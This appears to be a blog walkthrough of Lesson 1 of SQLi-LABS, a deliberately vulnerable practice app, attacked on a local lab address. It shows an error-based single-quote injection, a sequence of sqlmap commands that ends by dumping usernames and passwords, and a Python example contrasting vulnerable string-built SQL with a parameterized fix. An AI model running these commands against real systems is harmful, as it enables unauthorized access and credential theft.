browser: iceweasel
os: Kali Linux
Web App: SQLi-LABS
SQLi-LABS can be downloaded from
https://github.com/Audi-1/sqli-labs
There are several lessons and I will iterate through them all, starting with Less-1
lesson: number 1
Object: GET - Error based - Single quotes - String
This is simple stuff: just visit
http://192.168.0.9/sqli-labs/Less-1/
we are met with an info message
Please input the ID as parameter with numeric value
we can satisfy this by simply appending the following to the url
?id=1
so our full url will now look like
http://192.168.0.9/sqli-labs/Less-1/?id=1
a user's username & password are returned to the screen; changing ?id=1 to, for example, ?id=2 will display different credentials.
To get a simple error message produced on the screen, append
' (a single quote) to the url,
which returns the following error message
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
this bears all the hallmarks of a SQL injection vulnerability (the id value is being placed, unescaped, inside a single-quoted string in the query), so let's fire up sqlmap
sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" --dbs
this gives us the names of the databases.
if you're not sure which database to look in you'll have to poke around and see; our target is the security database. Next we want to have a look at the available tables, so our next command is
sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security --tables
and then the columns of the users table that this lists:
sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security -T users --columns
awesome, the users table has id, password and username columns. We want to see all of that, so here's the final command:
sqlmap --url="http://192.168.0.9/sqli-labs/Less-1/?id=1" -D security -T users -C id,password,username --dump
we have successfully exploited the SQL injection vulnerability to retrieve all ids, usernames and passwords from the MySQL database.
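To see the flaw from the other side of the fence, here is an added example (not from the original post and not the lab's own PHP) that rebuilds the lesson's query pattern against an in-memory SQLite table with constructed rows: the unsafe version pastes the id parameter into the SQL text and reproduces the `'1'' LIMIT 0,1` fragment from the error message above, while the hardened version validates that the id is numeric and binds it as a parameter. Table and column names follow the page; the sample users are made up.

```python
import sqlite3

# Constructed stand-in for sqli-labs' security.users table (rows are invented).
SAMPLE_USERS = [(1, "alice", "s3cret"), (2, "bob", "hunter2")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def build_query_unsafe(user_id: str) -> str:
    # Vulnerable pattern: the request parameter becomes part of the SQL text.
    # With user_id = "1'" this yields ... id='1'' LIMIT 0,1, the fragment the
    # lab's MySQL error message quotes back to the browser.
    return f"SELECT id, username, password FROM users WHERE id='{user_id}' LIMIT 0,1"


def lookup_unsafe(conn, user_id: str):
    # Returns ("ok", row) or ("error", message), mirroring how the lab
    # leaks the database's reaction onto the page.
    try:
        return ("ok", conn.execute(build_query_unsafe(user_id)).fetchone())
    except sqlite3.Error as exc:
        return ("error", str(exc))


def lookup_safe(conn, user_id: str):
    # Hardened form: enforce the numeric type the lab says it expects, then
    # bind the value so it can never change the structure of the statement.
    if not user_id.isdigit():
        return ("rejected", "id must be numeric")
    row = conn.execute(
        "SELECT id, username, password FROM users WHERE id=? LIMIT 1",
        (int(user_id),),
    ).fetchone()
    return ("ok", row)


if __name__ == "__main__":
    db = make_db()
    print(lookup_unsafe(db, "1"))   # normal request works either way
    print(lookup_unsafe(db, "1'"))  # stray quote -> SQL syntax error leaks out
    print(lookup_safe(db, "1'"))    # same input is rejected before reaching SQL
```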
remember that in the previous post, sqlmap-database-takeover-tool-old-skool,
we had to use the --data="" switch; this was because the method was POST. In this example the method is GET, therefore there was no need to use --data="".